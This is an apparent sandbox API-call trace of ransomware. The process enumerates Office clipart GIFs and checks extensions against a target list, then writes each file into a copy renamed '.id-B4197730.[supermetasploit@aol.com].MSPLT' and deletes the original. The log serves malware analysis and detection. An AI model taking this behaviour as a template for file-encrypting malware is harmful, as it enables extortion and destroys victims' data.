lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0183.995] lstrlenW (lpString=".docx") returned 5 [0183.995] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0183.995] lstrlenW (lpString=".pdf") returned 4 [0183.995] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0183.995] lstrlenW (lpString=".xls") returned 4 [0183.995] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0183.995] lstrlenW (lpString=".xlsx") returned 5 [0183.995] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0183.995] lstrlenW (lpString=".ppt") returned 4 [0183.995] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0183.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.995] lstrlenW (lpString=".zip") returned 4 [0183.995] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.995] lstrlenW (lpString=".rar") returned 4 [0183.995] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.995] lstrlenW (lpString=".bz2") returned 4 [0183.996] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0183.996] lstrlenW (lpString=".7z") returned 3 [0183.996] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0183.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.996] lstrlenW (lpString=".dbf") returned 4 [0183.996] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.996] lstrlenW (lpString=".1cd") returned 4 [0183.996] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0183.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.996] lstrlenW (lpString=".jpg") returned 4 [0183.996] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0183.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.996] lstrlenW (lpString=".doc") returned 4 [0183.996] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0183.996] lstrlenW (lpString=".docx") returned 5 [0183.996] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0183.996] lstrlenW (lpString=".pdf") returned 4 [0183.996] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0183.996] lstrlenW (lpString=".xls") returned 4 [0183.996] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0183.996] lstrlenW (lpString=".xlsx") returned 5 [0183.996] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0183.996] lstrlenW (lpString=".ppt") returned 4 [0183.997] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0183.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.997] lstrlenW (lpString=".zip") returned 4 [0183.997] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.997] lstrlenW (lpString=".rar") returned 4 [0183.997] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.997] lstrlenW (lpString=".bz2") returned 4 [0183.997] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0183.997] lstrlenW (lpString=".7z") returned 3 [0183.997] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0183.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.997] lstrlenW (lpString=".dbf") returned 4 [0183.997] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.997] lstrlenW (lpString=".1cd") returned 4 [0183.997] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0183.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.997] lstrlenW (lpString=".jpg") returned 4 [0183.997] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0183.997] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0183.997] lstrlenW (lpString="AG00011_.GIF") returned 12 [0183.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0184.358] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=7216) returned 1 [0184.358] CloseHandle (hObject=0x358) returned 1 [0184.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 0x220 [0184.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0184.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0184.378] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.378] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.303] GetLastError () returned 0x0 [0185.303] ReadFile (in: hFile=0x384, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x1c30, lpOverlapped=0x0) returned 1 [0185.313] WriteFile (in: hFile=0x350, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x1c40, lpOverlapped=0x0) returned 1 [0185.314] ReadFile (in: hFile=0x384, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.314] WriteFile (in: hFile=0x350, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.314] SetEndOfFile (hFile=0x350) returned 1 [0185.314] CloseHandle (hObject=0x350) returned 1 [0185.316] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.316] SetEndOfFile (hFile=0x384) returned 1 [0185.317] CloseHandle (hObject=0x384) returned 1 [0185.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0185.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.318] lstrlenW (lpString=".doc") returned 4 [0185.318] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.319] lstrlenW (lpString=".docx") returned 5 [0185.319] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.319] lstrlenW (lpString=".pdf") returned 4 [0185.319] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.319] lstrlenW (lpString=".xls") returned 4 [0185.319] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.319] lstrlenW (lpString=".xlsx") returned 5 [0185.319] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.319] lstrlenW (lpString=".ppt") returned 4 [0185.319] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.319] lstrlenW (lpString=".zip") returned 4 [0185.319] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.319] lstrlenW (lpString=".rar") returned 4 [0185.319] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.319] lstrlenW (lpString=".bz2") returned 4 [0185.319] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.319] lstrlenW (lpString=".7z") returned 3 [0185.319] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.319] lstrlenW (lpString=".dbf") returned 4 [0185.319] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.319] lstrlenW (lpString=".1cd") returned 4 [0185.319] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.319] lstrlenW (lpString=".jpg") returned 4 [0185.319] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.320] lstrlenW (lpString=".doc") returned 4 [0185.320] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.320] lstrlenW (lpString=".docx") returned 5 [0185.320] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.320] lstrlenW (lpString=".pdf") returned 4 [0185.320] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.320] lstrlenW (lpString=".xls") returned 4 [0185.320] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.320] lstrlenW (lpString=".xlsx") returned 5 [0185.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.320] lstrlenW (lpString=".ppt") returned 4 [0185.320] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.320] lstrlenW (lpString=".zip") returned 4 [0185.320] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.320] lstrlenW (lpString=".rar") returned 4 [0185.321] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.321] lstrlenW (lpString=".bz2") returned 4 [0185.321] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.321] lstrlenW (lpString=".7z") returned 3 [0185.321] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.321] lstrlenW (lpString=".dbf") returned 4 [0185.321] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.321] lstrlenW (lpString=".1cd") returned 4 [0185.321] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0185.321] lstrlenW (lpString=".jpg") returned 4 [0185.321] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.321] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.321] lstrlenW (lpString="AG00052_.GIF") returned 12 [0185.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.331] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=7686) returned 1 [0185.331] CloseHandle (hObject=0x358) returned 1 [0185.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 0x220 [0185.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.332] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.332] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0185.343] GetLastError () returned 0x0 [0185.343] ReadFile (in: hFile=0x358, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x1e06, lpOverlapped=0x0) returned 1 [0185.349] WriteFile (in: hFile=0x2fc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x1e10, lpOverlapped=0x0) returned 1 [0185.351] ReadFile (in: hFile=0x358, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.351] WriteFile (in: hFile=0x2fc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.351] SetEndOfFile (hFile=0x2fc) returned 1 [0185.351] CloseHandle (hObject=0x2fc) returned 1 [0185.356] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.356] SetEndOfFile (hFile=0x358) returned 1 [0185.358] CloseHandle (hObject=0x358) returned 1 [0185.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.358] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0185.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.358] lstrlenW (lpString=".doc") returned 4 [0185.359] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.359] lstrlenW (lpString=".docx") returned 5 [0185.359] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.359] lstrlenW (lpString=".pdf") returned 4 [0185.359] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.359] lstrlenW (lpString=".xls") returned 4 [0185.359] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.359] lstrlenW (lpString=".xlsx") returned 5 [0185.359] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.359] lstrlenW (lpString=".ppt") returned 4 [0185.359] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.359] lstrlenW (lpString=".zip") returned 4 [0185.359] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.359] lstrlenW (lpString=".rar") returned 4 [0185.359] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.359] lstrlenW (lpString=".bz2") returned 4 [0185.359] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.359] lstrlenW (lpString=".7z") returned 3 [0185.359] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.359] lstrlenW (lpString=".dbf") returned 4 [0185.359] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.359] lstrlenW (lpString=".1cd") returned 4 [0185.359] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.359] lstrlenW (lpString=".jpg") returned 4 [0185.360] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.360] lstrlenW (lpString=".doc") returned 4 [0185.360] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.360] lstrlenW (lpString=".docx") returned 5 [0185.360] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.360] lstrlenW (lpString=".pdf") returned 4 [0185.360] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.360] lstrlenW (lpString=".xls") returned 4 [0185.360] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.360] lstrlenW (lpString=".xlsx") returned 5 [0185.360] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.360] lstrlenW (lpString=".ppt") returned 4 [0185.360] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.360] lstrlenW (lpString=".zip") returned 4 [0185.360] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.360] lstrlenW (lpString=".rar") returned 4 [0185.360] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.360] lstrlenW (lpString=".bz2") returned 4 [0185.360] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.360] lstrlenW (lpString=".7z") returned 3 [0185.360] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.360] lstrlenW (lpString=".dbf") returned 4 [0185.360] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.361] lstrlenW (lpString=".1cd") returned 4 [0185.361] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0185.361] lstrlenW (lpString=".jpg") returned 4 [0185.361] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.361] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.361] lstrlenW (lpString="AG00090_.GIF") returned 12 [0185.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.378] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=517) returned 1 [0185.378] CloseHandle (hObject=0x358) returned 1 [0185.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 0x220 [0185.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.378] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.378] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0185.379] GetLastError () returned 0x0 [0185.379] ReadFile (in: hFile=0x358, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x205, lpOverlapped=0x0) returned 1 [0185.782] WriteFile (in: hFile=0x2fc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x210, lpOverlapped=0x0) returned 1 [0185.783] ReadFile (in: hFile=0x358, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.783] WriteFile (in: hFile=0x2fc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.784] SetEndOfFile (hFile=0x2fc) returned 1 [0185.784] CloseHandle (hObject=0x2fc) returned 1 [0185.788] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.788] SetEndOfFile (hFile=0x358) returned 1 [0185.789] CloseHandle (hObject=0x358) returned 1 [0185.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.790] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0185.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.790] lstrlenW (lpString=".doc") returned 4 [0185.790] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.790] lstrlenW (lpString=".docx") returned 5 [0185.790] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.790] lstrlenW (lpString=".pdf") returned 4 [0185.790] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.790] lstrlenW (lpString=".xls") returned 4 